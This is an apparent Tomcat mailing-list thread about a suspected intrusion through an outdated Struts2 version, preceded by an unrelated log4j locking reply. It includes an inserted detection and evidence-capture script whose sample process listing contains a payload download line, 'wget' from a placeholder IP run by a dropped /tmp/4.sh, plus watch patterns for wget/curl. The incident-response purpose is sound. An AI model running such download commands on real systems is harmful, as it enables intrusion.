at org.apache.log4j.Hierarchy.updateParents(Hierarchy.java:509)
at org.apache.log4j.Hierarchy.getLogger(Hierarchy.java:273)
- locked <0x00000006e0303d80> (a java.util.Hashtable)
MG>you need to kill the process or change the slow process ... (log4j updateParents), for example in log4j
package org.apache.log4j;
public class Hierarchy implements org.apache.log4j.spi.LoggerFactory, org.apache.log4j.spi.RendererSupport {
  private org.apache.log4j.spi.LoggerFactory defaultFactory;
  private java.util.Vector listeners;
  // Hashtable ht;
  // ConcurrentHashMap lives in java.util.concurrent, and the values stored under a
  // CategoryKey are either a Logger or a ProvisionNode (ht.put(key, logger) below
  // stores a Logger), so the map must be typed Object rather than ProvisionNode.
  java.util.concurrent.ConcurrentHashMap<CategoryKey,Object> ht =
      new java.util.concurrent.ConcurrentHashMap<CategoryKey,Object>();
  // much later
  public Logger getLogger(String name, org.apache.log4j.spi.LoggerFactory factory) {
    CategoryKey key = new CategoryKey(name);
    Logger logger;
    Object o = ht.get(key);
    if (o == null) {
      // .... (creates the new logger, registers it and returns it; unchanged)
    } else if (o instanceof Logger) {
      return (Logger) o;
    } else if (o instanceof org.apache.log4j.ProvisionNode) {
      //System.out.println("("+name+") ht.get(this) returned ProvisionNode");
      logger = factory.makeNewLoggerInstance(name);
      logger.setHierarchy(this);
      ht.put(key, logger);
      updateChildren((ProvisionNode) o, logger);
      updateParents(logger);
      return logger;
    }
    return null; // unreachable once the elided branch above is restored
  }
}
http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ConcurrentHashMap.html
MG>Understood?
MG>Martín
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello Chris, but this logfile was only one day.
Maybe I had a concept mismatch trying to capture the exact moment when the
execution begins.
My command was
while true; do
  CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v "127.0.0.1" | wc -l)
  if [ $CUENTO -gt 0 ]; then
    PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }')
    echo -e "Se encontro wget corriendo, sacando dump de JVM..."
    kill -3 $PIDJAVA
  fi
  sleep 3
done
Maybe too many dumps all together, now I'm trying to get a "live" capture
without luck =(
If you know a better method, please let me know.
Thanks for your effort, kind regards,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
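A tighter version of the watch loop in this post, added here as an example (not Leonardo's script and not anything from Tomcat): it matches the JVM on its Bootstrap class instead of on any command line containing "java", records the suspect's command line and a copy of the /tmp/4.sh script Chris asked to preserve before asking for the thread dump, and waits MIN_INTERVAL seconds between dumps so one detection does not produce a dump on every three-second poll. PATTERN, EVIDENCE_DIR, MIN_INTERVAL and SUSPECT_SCRIPT are assumed names; the ps listing in SAMPLE_PS is constructed.

```shell
#!/bin/sh
# Poll for a downloader spawned under the Tomcat JVM and, on detection, take one
# thread dump and keep the evidence. Added example for this thread, not Leonardo's
# script; PATTERN, EVIDENCE_DIR, MIN_INTERVAL and SUSPECT_SCRIPT are assumed names.

PATTERN="${PATTERN:-wget|curl}"                       # processes to watch for
EVIDENCE_DIR="${EVIDENCE_DIR:-/var/tmp/intrusion-evidence}"
MIN_INTERVAL="${MIN_INTERVAL:-60}"                    # seconds between two dumps
SUSPECT_SCRIPT="${SUSPECT_SCRIPT:-/tmp/4.sh}"         # the script named in the thread

# suspicious_pids "<ps -fea output>": prints "PID PPID" for each matching process,
# skipping the ps header, grep/awk helpers and loopback fetches as Leonardo's loop did.
suspicious_pids() {
    printf '%s\n' "$1" | awk -v pat="$PATTERN" '
        NR > 1 && $0 ~ pat && $0 !~ /grep|awk/ && $0 !~ /127\.0\.0\.1/ { print $2, $3 }'
}

# tomcat_pid "<ps -fea output>": the JVM running Catalina, matched on its Bootstrap
# class rather than on any command line that happens to contain "java".
tomcat_pid() {
    printf '%s\n' "$1" | awk 'NR > 1 && /org\.apache\.catalina\.startup\.Bootstrap/ { print $2; exit }'
}

# should_dump LAST NOW: true once MIN_INTERVAL seconds have passed since the last
# dump, so one intrusion does not yield a dump on every three-second poll.
should_dump() {
    [ $(( $2 - $1 )) -ge "$MIN_INTERVAL" ]
}

# capture_evidence SUSPECT_PID JVM_PID: record what the suspect was running and
# where, copy the script before the attacker cleans up, then ask the JVM for a
# thread dump (kill -3 writes it to catalina.out, exactly as in Leonardo's loop).
capture_evidence() {
    stamp=$(date +%Y%m%d-%H%M%S)
    dir="$EVIDENCE_DIR/$stamp"
    mkdir -p "$dir"
    tr '\0' ' ' < "/proc/$1/cmdline" > "$dir/suspect-$1.cmdline" 2>/dev/null || true
    readlink "/proc/$1/cwd" > "$dir/suspect-$1.cwd" 2>/dev/null || true
    if [ -f "$SUSPECT_SCRIPT" ]; then cp -p "$SUSPECT_SCRIPT" "$dir/"; fi
    kill -3 "$2" 2>/dev/null || true
    echo "$stamp suspect=$1 jvm=$2" >> "$EVIDENCE_DIR/detections.log"
}

# watch_loop: the polling loop itself; only runs when invoked with --watch.
watch_loop() {
    last=0
    while true; do
        listing=$(ps -fea)
        found=$(suspicious_pids "$listing")
        if [ -n "$found" ]; then
            now=$(date +%s)
            if should_dump "$last" "$now"; then
                capture_evidence "${found%% *}" "$(tomcat_pid "$listing")"
                last=$now
            fi
        fi
        sleep 3
    done
}

# Constructed ps -fea listing used by self_test: a Tomcat JVM, a shell running
# the dropped script, its wget child, a harmless loopback wget and our own grep.
SAMPLE_PS='UID PID PPID C STIME TTY TIME CMD
tomcat 4242 1 0 10:00 ? 00:01:02 /usr/bin/java -Dcatalina.home=/opt/tomcat org.apache.catalina.startup.Bootstrap start
tomcat 5150 4242 0 10:05 ? 00:00:00 /bin/sh /tmp/4.sh
tomcat 5151 5150 0 10:05 ? 00:00:00 wget -q http://198.51.100.10/x.txt -O /tmp/x
root 5160 1 0 10:05 ? 00:00:00 wget -q http://127.0.0.1/healthz -O /dev/null
me 5170 100 0 10:06 pts/0 00:00:00 grep wget'

# self_test: returns 0 when the pure functions pick out exactly the expected processes.
self_test() {
    [ "$(suspicious_pids "$SAMPLE_PS")" = "5151 5150" ] || return 1
    [ "$(tomcat_pid "$SAMPLE_PS")" = "4242" ] || return 1
    should_dump 0 "$MIN_INTERVAL" || return 1      # interval elapsed: dump
    if should_dump 5 5; then return 1; fi          # nothing elapsed: hold off
    return 0
}

case "${1:-}" in
    --watch) watch_loop ;;
    --self-test) self_test && echo "self-test ok" ;;
esac
```

Run it as `sh watch.sh --watch` from the Tomcat host; the dump still lands in catalina.out, while the evidence directory keeps the suspect's command line and the script copy.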
Re: Regarding i think an intrusion
Posted by Christopher Schultz <ch...@christopherschultz.net>.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Leonardo,
On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
> Ok, again it's uploaded.
>
> This is the link
>
> https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
1/2 GiB log file? Hrm.
It doesn't even have any calls to Runtime.exec in it. If you have a
snapshot of a thread dump (and only the thread dump, I don't need 3
weeks of your logs) that you took while the "intrusion" was taking
place, post that.
If you don't, then I think you're out of luck.
Sounds like a bad time to go on holiday.
-chris
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Ok, again it's uploaded.
This is the link
https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
Kind regards,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
Re: Regarding i think an intrusion
Posted by Christopher Schultz <ch...@christopherschultz.net>.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Leonardo,
On 5/5/14, 10:29 AM, Leonardo Santagostini wrote:
> Well thread dump is here
>
> https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing
Seems like it's broken.
-chris
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Well thread dump is here
https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing
Let me know if I'm missing something.
thanks !
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello all, sorry for the delay, but I was on holiday from Wednesday.
Ok, I made a ticket for the developers to upgrade Struts. They told me that
they will work on that.
So, I will keep in touch with the news =)
Again, thanks all for all the support you give me.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
Re: Regarding i think an intrusion
Posted by Christopher Schultz <ch...@christopherschultz.net>.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cédric,
On 5/1/14, 10:00 AM, Cédric Couralet wrote:
> 2014-04-30 19:07 GMT+02:00 Christopher Schultz
> <chris@christopherschultz.net
>> :
>
> Leonardo,
>
> On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
>>>> Im uploading mi logfiles so it will be available when
>>>> finished uploading.
>
> Remember to get a thread dump while Runtime.exec() is running.
>
> You should copy the script /tmp/4.sh somewhere else so you have a
> copy in case the attacker tries to clean-up after themselves.
> That's certainly what's doing the evil work.
>
> You could probably set up iptables or something to restrict
> outgoing requests so that the attack can't progress across your
> network.
>
>>>> Regarding the configuration, its working in two other sites
>>>> without problem, and there is no problem putting L4 balancing
>>>> with haproxy.
>>>>
>>>> I have asked developers about that exploit, still without
>>>> answer.
>
> You appear to be using struts2 2.1.8, which is in the range of
> versions vulnerable to this bug. There is a workaround that you
> can probably apply:
> http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the
> last section on this page).
>
>> Of course, the vulnerability doesn't allow you to simply inject
>> code
> or anything like that: you can certainly mess-around with code that
> is already available on the site, though.
>
>
>> I think the S2-021 can be used to inject code. There is a POC
>> circulating proving it. That said, this struts version (2.1.8) is
>> also vulnerable to
>> http://struts.apache.org/release/2.3.x/docs/s2-016.html which
>> permits code execution very easily.
Ouch. Yeah, there's always that ;)
-chris